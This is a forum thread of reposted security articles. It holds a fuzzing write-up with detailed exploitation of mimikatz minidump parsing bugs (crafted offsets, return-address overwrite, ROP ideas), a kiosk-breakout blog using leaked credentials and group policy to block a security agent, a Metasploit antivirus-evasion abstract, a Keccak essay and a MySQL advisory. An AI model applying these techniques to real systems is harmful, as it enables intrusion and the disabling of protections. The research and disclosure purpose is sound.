coverage; see the green area). Now the bad: Fuzzing speed is only 13 exec / sec (blue) which is extremly slow for AFL (but much faster than the self-written fuzzer which had 2 exec/sec per core). And now the really bad stuff: We are running for 14,5 hours and it didn’t finish the bitflip 1/1 stage yet for the first input file (and 136 others are in queue). You can see this in the red area because we just finished 97% of this stage. And after that 2/1 and 4/1 must be executed, then byte flips, arithmetics and so on. So we can see that continuing will not be very efficient. For demonstration I kept the fuzzer running, but modified my WinAppDbg script to filter better and started a new fuzzing job. The new WinAppDbg script reduced the number of “hot bytes” to 3KB (first we had 27 MB, then we had 91KB and now we just have 3KB to fuzz). This was possible because the new script does not count hits from search or copy functions, but also log access attempts from copied memory regions. This WinAppDbg script was approximatly 800 LoC (because I have to follow copies which go to heap and stack variables and I have to disable logging when the variables are freed). Here is a screenshot of the above job (with the “big” 91KB input files) after 2 days and 7 hours: We can see that the fuzzer finished bitflip 1/1 and 2/1 and is now inside 4/1 (with 98% finished). You can also see that the bitflip 1/1 strategy required 737k executions and 159 of these 737k executions resulted in new coverage (or crashes). Same for 2/1 where the stats are 29/737k. And we found 22 unique crashes in 2 days and 7 hours. And now the fuzzing of the smaller 3KB files after 2 hours: We can see that we already have 30 unique crashes after 2 hours! (Compare this with only 22 crashes after 2 days and 7 hours with the 91KB file!) We can also see that for example the bitflip 1/1 stage only required 17.9k executions (instead of 737k) because of the reduced input file size. Moreover, we can see that we found 245 unique paths and this with just 103k total executions (compared to 184 unique paths with 2.17 million executions from the 91KB test input). And now consider how long it would have taken us to fuzz the full 27MB file (!!) and what results we would have seen after some days of fuzzing. Now you should understand the importance of the input file size. Here is one more demonstration of the different input file sizes. The following animated image (created via Veles https://github.com/wapiflapi/veles) shows a visualization of the 27 MB original minidump file: And now the 27 MB minidump file where all unimportant (not read) bytes are replaced with 0x00 so we only see the 3 KB bytes which we fuzz with WinAFL; you maybe have to zoom in to see them. Look at the intersection of the 3 coordinate axes. However, in my opinion even the 3KB fuzzing job is too slow / inefficient. If we can start the job on multiple cores and let it run over one or two weeks, we should get into deeper levels and the result should be OK. But why are we even so slow? Why do we only have an execution speed of 13 or 16 exec / sec? Later queue entries will result in faster execution speeds because mimikatz will not execute the full code because the inputs trigger error-conditions (which result in execution speeds like 60 exec / sec). But on Linux we often deal with execution speeds of several thousand executions per second. A major point is that we have to load and search a 27MB file with every execution, so reducing this file size could really be a good idea (but requires lots of manual work). On the other hand, we can compare the execution speeds of different setups: Execution speed with WinAFL in syzygy mode: ~13 exec / sec Native execution speed without WinAFL and without instrumentation (in-memory): ~335 exec / sec Execution without WinAFL but with instrumented (syzygy) binary: ~50 exec / sec Execution of native binary (Instrumentation via DynamoRio drcov): ~163 exec / sec So we can see that syzygy instrumentation results in a slow-down factor of approximatly 6. And syzygy+WinAFL a factor of approximatly 25. This is mainly because of the process switches and file writes / reads because we are not doing full in-memory fuzzing, but there is also another big problem! We can see that instrumentation via DynamoRio is faster than syzygy (163 exec/sec vs. 50 exec/sec) and we can also start WinAFL with the DynamoRio mode (which does not require source code at all). If we do this, we get an execution speed of 0,05 – 2 exec/sec with WinAFL. At this point you should recognize that something is not working correctly because DynamoRio mode should be much faster! The reason can be found in our modification of the kull_m_sekurlsa_all() function. I added the two code lines kuhl_m_sekurlsa_reset() and pMinidumpName = argv[1] at the start because this is exactly what the “sekurlsa::minidump” command is doing. What I wanted to achieve is to immediatly execute the “sekurlsa::minidump” command and after that the “sekurlsa::logonpasswords” command and that’s why I used this sequence of code calls. However, this is a huge problem because we exit the function (DynamoRio mode) or the __afl_persistent_loop (syzygy mode) with a state where the input file is still open! This is because we call the kuhl_m_sekurlsa_reset() function at the start of the function and not at the end! That means that we only execute one “execution” in-memory, then WinAFL tries to modify the input file, detects that the file is still open and can’t be written to and then terminates the running process (via TerminateProcess from afl-fuzz.c:2186 in syzygy mode or nudges in DynamoRio mode from afl-fuzz.c:2195) to write to the file. Therefore, we do not do real in-memory fuzzing because we execute the application one time and then the application must be closed and restarted to write the next test case. That’s why the DynamoRio mode is so slow because the application must be started again for every testcase which means the application must be instrumented again and again (DynamoRio is a dynamic instrumentation framework). And because syzygy instrumented statically it’s not affected so heavily by this flaw (it still has to restart the application, but does not have to instrument again). Let’s fix the problem by reordering kuhl_m_sekurlsa_reset() to the end of the function: NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[]) { While(__afl_persistent_loop()) { pMinidumpName = argv[1]; kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages); kuhl_m_sekurlsa_reset(); } Return NT_SUCCESS; } If we execute this, we still face the same problem. The reason is a bug inside mimikatz in the kuhl_m_sekurlsa_reset() function. Mimikatz opens the input file via three calls: CreateFile CreateFileMapping MapViewOfFile Therefore, we have to close all these three handles / mappings. However, mimikatz fails at closing the CreateFile handle. Here is the important code from kuhl_m_sekurlsa_reset() case KULL_M_MEMORY_TYPE_PROCESS_DMP: toClose = cLsass.hLsassMem->pHandleProcessDmp->hMinidump; break; ... } cLsass.hLsassMem = kull_m_memory_close(cLsass.hLsassMem); CloseHandle(toClose); Kull_m_memory_close() correctly closes the file mapping, but the last CloseHandle(toClose) call should close the handle received from CreateFile. However, toClose stores a heap address from (kull_m_minidump_open()): *hMinidump = (PKULL_M_MINIDUMP_HANDLE) LocalAlloc(LPTR, sizeof(KULL_M_MINIDUMP_HANDLE)); That means the code calls CloseHandle on a heap address and never calls CloseHandle on the original file handle (which gets never stored). After fixing this issue it starts to work and WinAFL gets 30-50 exec / sec! However, these executions are very inconsistent, sometimes drop down to under 1 execution per second (when the application must be restarted like after crashes). Because of this we got overall better fuzzing performance with the syzygy mode (which now has a speed of ~25 exec / sec) which also uses edge coverage. Screenshot of WinAFL DynamoRio mode (please bear in mind that the default mode is basic block coverage and not edge coverage with DynamoRio): Screenshot of WinAFL syzygy mode: Even if DynamoRio mode has a higher execution speed (29.91 exec / sec vs. 24.02 exec / sec) it’s in total slower because the execution speed is inconsistent. We can see this because DynamoRio mode is running since 25 minutes and just got total executions of 13.9k and syzygy mode just runs for 13 minutes but already got 16.6k executions. We can see that currently it’s more efficent to fuzz with syzygy mode if source code is available (especially if the target application crashes very often). And also very important: We had a bug in the code which slowed down the fuzzing process (at least by a factor of 2) and we didn’t see it during syzygy fuzzing! (A status screen entry with in-memory executions vs application restarts would be a great feature!) Please also note that the WinAFL documentation explicitly mentions this in the “How to select a target function” chapter: Close the input file. This is important because if the input file is not closed WinAFL won’t be able to rewrite it. Return normally (So that WinAFL can “catch” this return and redirect execution. “returning” via ExitProcess() and such won’t work) The second point is also very important. If an error condition triggers code which calls ExitProcess during fuzzing, we also end up starting the application again and again (and do not get the benefit of in-memory fuzzing). This is no problem with mimikatz. However, mimikatz crashes very often (e.g. 1697 times out of 16600 executions) and with every crash we have to restart the application. This mainly affects the performance of the DynamoRio mode because of the dynamic instrumentation and then it’s better to use the syzygy mode. Please also note that we can “fix” this by storing the stack pointer in the pre-fuzzing-handler of DynamoRio, implementing a crash handler where we restore the stack and instruction pointer, free the file mappings and handles and just continue fuzzing as if nothing had happend. Memory leaks can also be handled by hooking and replacing the heap implementation to free all allocations from the fuzzing-loop. Only global variables could become a probem, but this discussion goes too far here. At the end I started a fuzzing job with syzygy mode, one master (deterministic fuzzing) and 7 slaves (non-deterministic fuzzing) and let it run for 3 days (plus one day with page heap). In total I identified ~130 unique AFL crash signatures, which can be reduced to 42 unique WinDbg crash signatures. Most of them are not security-relevant, however, two crashes are critical. PRACTICE: ANALYSIS OF THE IDENTIFIED CRASHES Vulnerability 1: Arbitrary partial relative stack overwrites In this chapter I only want to describe the two critical crashes in depth. After fuzzing I had several unique crashes (based on the callstack of the crash) which I sorted with a simple self-written heuristic. From this list of crashes I took the first one (the one where I thought it’s the most likely to be exploitable) and analysed it. Here are the exact steps: This is the code with the vulnerability: The variable “myDir” is completly under our control. myDir points into our memory dump, we can therefore control all content of this struct. You maybe want to find the problem yourself before continuing, here are some hints: The argument length is always 0x40 (64) which is exactly the length of the destination argument buffer The argument source is also under our full control Obviously we want to reach RtlCopyMemory() from line 29 with some malicious arguments Now try to think how we can exploit this. My thoughts Step-by-Step: I want to reach line 29 (RtlCopyMemory() and therefore the IF statement from line 9-13 must be true. We can exploit the situation if “lengthToRead” (size argument) from the RtlCopyMemory call is bigger than 0x40 or if offsetToWrite is bigger than 0x40. The second case would be better for us because such relative writes are extremely powerful (e.g. just partially overwriting return addresses to bypass ASLR or to skip stack cookies and so on). So I decided to try exactly this, somehow control “offsetToWrite” which is only set in line 18 and 23. Line 23 is bad because it sets it to zero, so we take line 18. Since we want to come to line 18, the IF statement from line 15 must become true. First condition: Source < memory64→StartOfMemory This is no problem because we control both values completely. So far, so simple. Now lets check the first IF statement (line 9-13). One of the three conditions (line 10, 11 or 12) must evaluate to true. Lets focus on line 12 because from the IF from line 15 we know that Source < memory64→StartOfMemory must be true which is exactly what the first check is here for. So this one is true. That means we only have to ensure the second check: Second condition: Source + Length > (memory64→StartOfMemoryRange + memory64→DataSize) I leave this condition for one moment and think about line 25-27. What I want in RtlCopyMemory is to get as much control as possible. That means I want to control the target address (if possible, relative to an address to deal with ASLR), the source address to point into my own buffer and the size – that would really be great. The size is exactly lengthToRead and this variable can be set via line 25 and 27. 25 would be a bad choice because Length is fixed and offsetToWrite is already “used” to control the target address. So we must come to line 27. OffsetToRead is always zero because of line 17 and therefore memory64→DataSize completly controls lengthToRead. Now we can fix the next value and say that we want memory64→DataSize to be always 1 (to make 1-byte partial overwrites; or we set it to 4 / 8 to control full addresses). Now we are ready and take the second condition and fill in the known values. What we get is: Second condition: Source + 0x40 > (memory64→StartOfMemoryRange + 1) This check (together with the first condition) is exactly the check which should ensure that dataSize (the number of bytes which we write) is within the size of the buffer (0x40). However, we can force an integer overflow :). We can just set memory64→StartOfMemoryRange to 0xffffffffffffffff and therefore we survive the check because after adding one to it we get zero and that means Source + 0x40 is always bigger than zero (If we don’t overflow source+0x40). At the same time we survive the first condition because source will be smaller than 0xffffffffffffffff. Now we can also control offsetToWrite via line 18: offsetToWrite = 0xffffffffffffffff – source You might think that we can’t fully control offsetToWrite because the source variable is on x86 mimikatz just 32-bit (and the 0xffff… is 64-bit), however, because of integer truncation the upper 32-bit will be removed and therefore we can really address any byte in the address space relative to the destination buffer (on x64 mimikatz it’s 64-bit and therefore it’s also no problem). This is an extremely powerful primitive! We can overwrite bytes on the stack via relative offsets (ASLR is no obstacle here), we have full control over the size of the write-operation and full control over the values! The code can also be triggered multiple times (loop at line 7 is not useful because the destination pointer is not incremented) via loops which call this function (with some limitations). The next question is what offset do we use? Since we write relative to a stack variable we are going to target a return address. The destination variable is passed as argument inside the kull_m_process_ntheaders() function and this is exactly where we place a breakpoint on the first kull_m_memory_copy() call. Then we can extract the “destination” argument address and the address where the return address is stored and subtract them. What we get is the required offset to overwrite the return address. For reference, here are the offsets which I used for my dump file (dump files from other operating systems require very likely different offsets). Offset 0x6B4 stores the “source” variable. I use 0xffffff9c here because this is exactly the correct offset from “destination” to “return address” on the current release version of mimikatz (mimikatz 2.1.1 from Aug 13 2017; However, this offset should also work for older versions!). Offset 0xF0 stores the “myDir” struct content. The first 8 bytes store the NumberOfMemoryRanges (this controls the number of loops and therefore how often we can write). Since we just want to demonstrate the vulnerability we set it to one to make exactly one write operation (overwrite the return address). The next 8 bytes are the BaseRVA. This value controls “ptr” in line 6 which is the source from where we copy stuff. So we have to store there the relative offset in our dump file where we store the new return address (which should overwrite the original one). I’am using the value 0x90 here but we can use any value. It’s only important that we store the new return address at that offset (in my case offset 0x90) then. I therefore wrote 0x41414141 to offset 0x90. The next 8 bytes control the “StartOfMemoryRange” variable. I originally used 0xffffffffffffffff (like in the above example), however, for demonstration purpose I wanted to overwrite 4 bytes of the return address (and not only 1) and therefore had to subtract 4 (the DataSize, check the second condition in line 12). The next 8 bytes control the “DataSize” and as already explained I set this to 4 to write 4 bytes. Here is the file: Hint: In the above figure the malicious bytes start at offset 0xF0. This offset can differ in your minidump file. If we check the byte at 0x0C (= 0x20) we can see that this is the offset to the “streams” directory. Therefore, the above minidump has a streams directory starting at offset 0x20. Every entry there consists of 3 DWORDS (on x86), the first is the type and the last is the offset. We search for the entry with type 0x09 (=Memory64ListStream). This can be found in our figure at offset 0x50. If we take the 3rd DWORD from there we can see that this is exactly 0xF0 – the offset where our malicious bytes start. If this offset is different in your minidump file you may want to patch it first. And here is the proof that we really have control over the return address: Please note that full exploitation is still tricky because we have to find a way around ASLR. Because of DEP our data is marked as not executable, therefore we can’t jump into shellcode. The default bypass technique is to apply ROP which means that we instead invoke already existing code. However, because of ASLR this code is always loaded at randomized addresses. And here is what we can do with the above vulnerability is: We can make a relative write on the stack which means we can overwrite the return address (or arguments or local variables like loop counters or destination pointers). Because of the relative write we can bypass stack ASLR. Next we can choose the size of the write operation which means we can make a partial overwrite. We can therefore overwrite only the two lower bytes of the return address which means we can bypass module level ASLR (These two conditions make the vulnerability so useful). We can check the ranges which we can reach by checking the call-stack to the vulnerable code (every return address on this stack trace can be targeted via a partial overwrite) and we have multiple paths to come to the vulnerable code (and therefore different call-stacks with different ranges; We can even create more different call-stacks by overwriting a return address with an address which creates another call-stack to the vulnerable code). For example, a simple exploit could be to overwrite one of the return addresses with the address of code which calls LoadLibraryA() (e.g. 0x455DF3 which is in range) or LoadLibraryW (e.g. 0x442145). The address must be chosen in a way that the function argument is a pointer to the stack because then we can use the vulnerability to write the target path (UNC Path to a malicious library) to this address on the stack. Next, this exploit could be extended to first call kull_m_file_writeData() to write a library to the file system which gets later loaded via LoadLibrary (this way UNC paths are not required for exploitation). Another idea would be to make a specific write which exchanges the destination and source arguments from the vulnerable code. Then the first write operations can be used to write the upper bytes of return addresses (which are randomized by ASLR) to the memory dump buffer. After that these bytes can be written back to the stack (with the vulnerability) and full ROP chains can be built because we can now write ROP gadget addresses after each other. Without this idea we cannot execute multiple ROP gadgets after each other because they are not stored adjacent on the stack (return addresses are not stored next to each other on stack because there is other memory stored there like arguments, local variables and so on). However, I believe that this exploitation scenario is much more difficult because it requires multiple writes (which must be sorted to surive all checks in the mimikatz code), so the first approach with LoadLibrary should be more simple to implement. Vulnerability 2: Heap overflow The major cause of the second vulnerability can be found inside kull_m_process_getUnicodeString(). The first parameter (string) is a structure with the fields buffer (data pointer), a maximum length of bytes the string can hold and the length (currently stored characters). The content is completely under attacker control because it is parsed from the minidump. Moreover, the source (the second argument) also points to the minidump (attacker controlled). Mimikatz always extracts the string structure from the minidump and calls after that kull_m_process_getUnicodeString() to fill string->buffer with the real string from the minidump. Can you spot the problem? Line 9 allocates space for string->MaximumLength bytes and after that it copies exactly the same number of bytes from the minidump to the heap (line 11). However, the code never checks string->Length and therefore string->Length can be bigger than string->MaximumLength because this value is retrieved from the minidump. If later code uses string->Length a heap overflow can occur. This is for example the case when MSV1.0 (dpapi) credentials are stored in the minidump. Then mimikatz uses the string as input (and output) inside the decryption function in kuhl_m_sekurlsa_nt6_LsaEncryptMemory() and the manipulated length value leads to a heap overflow (however, the MSV1.0 execution path is not trivial/possible to exploit in my opinion, but there are many other paths which use kull_m_process_getUnicodeString()). Vulnerabilities patch status At time of publication (2017-09-22) there is no fix available for mimikatz. I informed the author on 2017-08-26 about the problems and received on 2017-08-28 a very friendly answer, that he will fix the flaws if it does not expand the code base too much. He also pointed out that mimikatz was developed as a proof-of-concept and it could be more secure by using a higher level language on which I totally agree on. On 2017-08-28 I sent the SMIME encrypted vulnerability details (together with this blog post). Since I didn’t receive answers on further emails or twitter messages, I informed him on 2017-09-06 about the blog post release on 2017-09-21. If you are a security consultant and using mimikatz in minidump mode, make sure to only use it inside a special mimikatz-virtual machine which is not connected to the internet/intranet and does not store important information (I hope you are already doing this anyway). To further mitigate the risk (e.g. a VM escape) I recommend to fix the above mentioned vulnerabilities. THEORY: RECOMMENDED FUZZING WORKFLOW In this last chapter, I want to quickly summarize the fuzzing workflow which I recommend: Download as many input files as possible. Calculate a minset of input files which still trigger the full code/edge coverage (corpus distillation). Use a Bloom-Filter for fast detection of different coverage. Minimize the file size of all input files in the minset. For the generated minset, calculate the code coverage (no Bloom-Filter). Now we can statically add breakpoints (byte 0xCC) at all basic blocks which were not hit yet. This modified application can be started with all files from the input and should not crash. However, we can continue downloading more files from the internet and start the modified binary (or just fuzz it). As soon as the application crashes (and our Just-in-Time configured compiler script kicks in) we know that a new code path was taken. Using this approach, we can achieve native execution speed but extract the information about new coverage! (downside: Checksums from files break; Moreover, a fork-server should also be used.) During fuzzing I recommend extraction of edge coverage (which requires instrumentation) and therefore we should fuzz with instrumentation (and sanitizers / heap libraries). For every input, we conduct an analysis phase before fuzzing. This analysis phase does the following: First identify the common code which gets executed for most inputs (for this we had to log the code coverage without the bloom-filter). Then get the code coverage for the current input and subtract the common code coverage from it. What we get is the code coverage which makes this fuzzing input “important” (code which only gets executed for this input). Next, we start our heatmap analysis but we just log the read operations conducted by this “important code”! What we get from this are the bytes which make our input “important”. Now we don’t have to fuzz the full input file, nor we have to fuzz the bytes which are read by the application, instead we only have to fuzz the few bytes which make the file “special”! I recommend focusing on these “special” bytes but also fuzz the other bytes afterwards (Fuzzing the special bytes fuzzes the new code, fuzzing all bytes fuzzes the old code with the new state resulting from the new code). Moreover, we can add additional slow checks which must be done only once for a new input (e.g. log all heap allocations and check for dangling-pointers after a free-operation; similar concept to Edge’s MemGC). Of course, some additional feedback and symbolic execution. Want to learn more about fuzzing? Come to one of my fuzzing talks (heise devSec or IT-SeCX for fuzzing applications with source code available and DefCamp for fuzzing closed-source applications!) or just follow me on Twitter. Sursa: https://www.sec-consult.com/en/blog/2017/09/hack-the-hacker-fuzzing-mimikatz-on-windows-with-winafl-heatmaps-0day/index.html
-
- 2
-
-
Metasploit Low Level View Saad Talaat (saadtalaat@gmail.com) @Sa3dtalaat Abstract: for the past decade (almost) Metasploit have been number one pentesting tool. A lot of plug-ins have been developed specially for it. However, the key-point of this paper is to discuss metasploit framework as a code injector and payload encoder. Another key-point of this paper is malware different forms and how to avoid anti-viruses which have been a pain for pentesters lately. And how exactly anti-malware software work. Download: https://www.exploit-db.com/docs/18532.pdf
-
- 1
-
-
Why Keccak is not ARX If SHA-2 is not broken, why would one switch to SHA-3 and not just stay with SHA-2? There are several arguments why Keccak/SHA-3 is a better choice than SHA-2. In this post, we come back on a particular design choice of Keccak and explain why Keccak is not ARX, unlike SHA-2. We specified Keccak at the bit-level using only transpositions, bit-level additions and multiplications (in GF(2)). We arranged these operations to allow efficient software implementations using fixed sequences of bitwise Boolean instructions and (cyclic) shifts. In contrast, many designers specify their primitives directly in pseudocode similarly including bitwise Boolean instructions and (cyclic) shifts, but on top of that also additions. These additions are modulo 2n with n a popular CPU word length such as 8, 32 or 64. Such primitives are dubbed ARX that stands for “addition, rotation and exclusive-or (XOR)”. The ARX approach is widespread and adopted by popular designs MD4, MD5, SHA-1, SHA-2, Salsa, ChaCha, Blake(2) and Skein. So why isn't Keccak following the ARX road? We give some arguments in the following paragraphs. ARX is fast! It is! Is it? One of the main selling points of ARX is its efficiency in software: Addition, rotation and XOR usually only take a single CPU cycle. For addition, this is not trivial because the carry bits may need to propagate from the least to the most significant bit of a word. Processor vendors have gone through huge efforts to make additions fast, and ARX primitives take advantage of this in a smart way. When trying to speed up ARX primitives by using dedicated hardware, not so much can be gained, unlike in bit-oriented primitives as Keccak. Furthermore, the designer of an adder must choose between complexity (area, consumption) or gate delay (latency): It is either compact or fast, but not at the same time. A bitwise Boolean XOR (or AND, OR, NOT) does not have this trade-off: It simply take a single XOR per bit and has a gate delay of a single binary XOR (or AND, OR, NOT) circuit. So the inherent computational cost of additions is a factor 3 to 5 higher than that of bitwise Boolean operations. But even software ARX gets into trouble when protection against power or electromagnetic analysis is a threat. Effective protection at primitive level requires masking, namely, where each sensitive variable is represented as the sum of two (or more) shares and where the operations are performed on the shares separately. For bitwise Boolean operations and (cyclic) shifts, this sum must be understood bitwise (XOR), and for addition the sum must be modulo 2n. The trouble is that ARX primitives require many computationally intensive conversions between the two types of masking. ARX is secure! It is! Is it? The cryptographic strength of ARX comes from the fact that addition is not associative with rotation or XOR. However, it is very hard to estimate the security of such primitives. We give some examples to illustrate this. For MD5, it took almost 15 years to be broken while the collision attacks that have finally been found can be mounted almost by hand. For SHA-1, it took 10 years to convert the theoretical attacks of around 2006 into a real collision. More recently, at the FSE 2017 conference in Tokyo, some attacks on Salsa and ChaCha were presented, which in retrospect look trivial but that remained undiscovered for many years. Nowadays, when a new cryptographic primitive is published, one expects arguments on why it would provide resistance against differential and linear cryptanalysis. Evaluating this resistance implies investigating propagation of difference patterns and linear masks through the round function. In ARX designs, the mere description of such difference propagation is complicated, and the study of linear mask propagation has only barely started, more than 25 years after the publication of MD5. A probable reason for this is that (crypt)analyzing ARX, despite its merits, is relatively unrewarding in terms of scientific publications: It does not lend itself to a clean mathematical description and usually amounts to hard and ad-hoc programming work. A substantial part of the cryptographic community is therefore reluctant to spend their time trying to cryptanalyze ARX designs. We feel that the cryptanalysis of more structured designs such as Rijndael/AES or Keccak/SHA-3 leads to publications that provide more insight. ARX is serious! It is! Is it? But if ARX is really so bad, why are there so many primitives from prominent cryptographers using it? Actually, the most recent hash function in Ronald L. Rivest's MD series, the SHA-3 candidate MD6, made use of only bitwise Boolean instructions and shifts. More recently, a large team including Salsa and ChaCha designer Daniel J. Bernstein published the non-ARX permutation Gimli. Gimli in turn refers to NORX for its design approach, a CAESAR candidate proposed by a team including Jean-Philippe Aumasson and whose name stems from a rather explicit “NO(T A)RX”. Actually, they are moving in the direction where Keccak and its predecessors (e.g., RadioGatún, Noekeon, BaseKing) always were. So, maybe better skip ARX? Sursa: https://keccak.team/2017/not_arx.html
-
Breaking out of Restricted Windows Environment ON JUNE 14, 2017 BY WEIRDGIRL Many organizations these days use restricted windows environment to reduce the surface of vulnerability. The more the system is hardened the less the functionalities are exposed. I recently ran across such a scenario, where an already hardened system was protected by McAfee Solidcore. Solidcore was preventing users from making any changes to the system like installing/un-installing softwares, running executables, launching applications etc. The system (Windows 7) which I was testing, boots right on to the application login screen while restricting access to other OS functionalities. I could not do anything with that system except for restarting it. I spent a whole week in gathering information about the application and the system, which includes social engineering as well And then I got an entry point to start with. The credentials to login to the application(that gave me headache for one week) was available on Internet (thanks to Google dork). The credential I got was admin credential. After logging in to the application there was no way to get out of the application and get in to the base system. The application was so well designed that there was not a single way to get out of it. Then I found an option in the application to print some document. Then clicked on print-->printer settings-->add a printer-->location-->browse location and I got access to file browser of host machine. Every windows file explorer has a windows help option which provides free help about windows features. It was possible to open command prompt from the help option. I was only able to open command prompt but not any other windows application. Even after getting access to command prompt I was unable to do any changes in the system(not even opening a notepad). Every windows application that I tried to open, ended up with the following error message: The error was very clear that the application is blocked and it can either be enabled from registry editor or group policy editor. However I did not have access to both of them. Solidcore was blocking access to any of those. So I used the following batch script to enable task manager. The script was used to modify the registry key(though I didn’t have any idea if it was actually blocked from registry editor or group policy editor): And to my surprise I was able to unlock task manager. Similarly I was able to unlock and open control panel. My main objective was to disable or uninstall Solidcore as it was restricting the desktop environment. But then the system kept on giving me challenges. I was able to uninstall any software except for Solidcore. Then there was only one way left to disable Solidcore / enable installation of other software and that was “Group Policy Editor“. However I didn’t have direct access to gpedit. I used the following way to get access to gpedit: Open Task manager-->File -->New task-->Type MMC and enter This opened Microsoft Management Policy In mmc File-->Add/Remove snap-in--> Select Group Policy Objects and click on add After this I was able to perform numerous actions like enabling blocked system applications, allowing access to Desktop, disabling windows restrictions etc. However my main objective was to disable Solidcore and find out a way to run any windows executable. Group Policy editor provides an option to run/block only allowed windows software. And this policy can be set in the following way: Group Policy editor-->User Configuration > Administrative Templates > System On the right side there's option "Do not run specified windows applications". Click on that: Edit-->Select Enabled-->Click on show list of disallowed applications--> then add the application name that you want to block(in my case it was solidcore). Then click "Ok" . To apply changes I restarted my system. In the same way it was possible to enable list of allowed applications that can run in windows(a malicious software as well). And that’s how I was able to break out of a completely restricted desktop environment Sursa: https://weirdgirlweb.wordpress.com/2017/06/14/first-blog-post/
-
- 2
-
-
-
[RHSA-2017:2787-01] Important: rh-mysql56-mysql security and bug fix update From: "Security announcements for all Red Hat products and services." <rhsa-announce@xxxxxxxxxx> To: rhsa-announce@xxxxxxxxxx Date: Thu, 21 Sep 2017 03:43:23 -0400 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: rh-mysql56-mysql security and bug fix update Advisory ID: RHSA-2017:2787-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2017:2787 Issue date: 2017-09-21 CVE Names: CVE-2016-5483 CVE-2016-8327 CVE-2017-3238 CVE-2017-3244 CVE-2017-3257 CVE-2017-3258 CVE-2017-3265 CVE-2017-3273 CVE-2017-3291 CVE-2017-3302 CVE-2017-3305 CVE-2017-3308 CVE-2017-3309 CVE-2017-3312 CVE-2017-3313 CVE-2017-3317 CVE-2017-3318 CVE-2017-3450 CVE-2017-3452 CVE-2017-3453 CVE-2017-3456 CVE-2017-3461 CVE-2017-3462 CVE-2017-3463 CVE-2017-3464 CVE-2017-3599 CVE-2017-3600 CVE-2017-3633 CVE-2017-3634 CVE-2017-3636 CVE-2017-3641 CVE-2017-3647 CVE-2017-3648 CVE-2017-3649 CVE-2017-3651 CVE-2017-3652 CVE-2017-3653 ===================================================================== 1. Summary: An update for rh-mysql56-mysql is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64 3. Description: MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs. The following packages have been upgraded to a later upstream version: rh-mysql56-mysql (5.6.37). Security Fix(es): * An integer overflow flaw leading to a buffer overflow was found in the way MySQL parsed connection handshake packets. An unauthenticated remote attacker with access to the MySQL port could use this flaw to crash the mysqld daemon. (CVE-2017-3599) * It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) * Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) * It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291) * It was discovered that the MySQL client command line tools only checked after authentication whether server supported SSL. A man-in-the-middle attacker could use this flaw to hijack client's authentication to the server even if the client was configured to require SSL connection. (CVE-2017-3305) * Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) * A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) * This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages listed in the References section. (CVE-2016-8327, CVE-2017-3238, CVE-2017-3244, CVE-2017-3257, CVE-2017-3258, CVE-2017-3273, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3450, CVE-2017-3452, CVE-2017-3453, CVE-2017-3456, CVE-2017-3461, CVE-2017-3462, CVE-2017-3463, CVE-2017-3464, CVE-2017-3633, CVE-2017-3634, CVE-2017-3636, CVE-2017-3641, CVE-2017-3647, CVE-2017-3648, CVE-2017-3649, CVE-2017-3651, CVE-2017-3652, CVE-2017-3653) Red Hat would like to thank Pali Rohár for reporting CVE-2017-3305. Bug Fix(es): * Previously, the md5() function was blocked by MySQL in FIPS mode because the MD5 hash algorithm is considered insecure. Consequently, the mysqld daemon failed with error messages when FIPS mode was enabled. With this update, md5() is allowed in FIPS mode for non-security operations. Note that users are able to use md5() for security purposes but such usage is not supported by Red Hat. (BZ#1452469) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 After installing this update, the MySQL server daemon (mysqld) will be restarted automatically. 5. Bugs fixed (https://bugzilla.redhat.com/): 1414133 - CVE-2017-3312 mysql: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 fix (CPU Jan 2017) 1414337 - CVE-2016-8327 mysql: Server: Replication unspecified vulnerability (CPU Jan 2017) 1414338 - CVE-2017-3238 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2017) 1414342 - CVE-2017-3244 mysql: Server: DML unspecified vulnerability (CPU Jan 2017) 1414350 - CVE-2017-3257 mysql: Server: InnoDB unspecified vulnerability (CPU Jan 2017) 1414351 - CVE-2017-3258 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017) 1414352 - CVE-2017-3273 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017) 1414353 - CVE-2017-3313 mysql: Server: MyISAM unspecified vulnerability (CPU Jan 2017) 1414355 - CVE-2017-3317 mysql: Logging unspecified vulnerability (CPU Jan 2017) 1414357 - CVE-2017-3318 mysql: Server: Error Handling 